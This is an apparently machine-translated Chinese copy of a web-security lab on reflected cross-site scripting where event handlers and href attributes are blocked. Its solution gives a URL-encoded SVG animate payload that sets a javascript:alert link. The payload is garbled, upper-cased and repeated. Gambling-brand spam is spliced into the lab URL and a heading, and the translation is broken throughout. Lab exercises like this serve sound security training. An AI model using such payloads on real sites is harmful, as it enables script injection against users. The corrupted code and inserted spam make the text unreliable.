实验室:带有事件处理程序的XS和HREF属性被阻止
专家
这个实验室包含一个反映XSS带有一些白色标签的脆弱性,但所有事件和锚点HREF属性被阻止..
要解决实验室,执行跨站脚本攻击注射一个向量,当单击时,警报功能。
请注意,您需要用“单击”单词标记矢量,以诱导模拟实验室用户单击您的向量。例如:
单击我
解决方案
访问以下URL,更换您的LAB-ID使用您的实验室ID:
https://your-lab-id.beplay体育能用吗web-security-academy.net/?search=%3CSVG%3E%3CA%3CA%3CA%3E%3CACANIMED+ATTRIBUTENAME%3DHREF+VALUES%3DJAVASCRIPT%3DJAVASCRIPT%3AALERT%3AALERT3ctext+x%3D20+y%3D20%3ECLICK%20ME%3C%2ftext%3E%3C%2FA%3E
社区解决方案beplay维护得多久
迈克尔·索默(Michael Sommer)
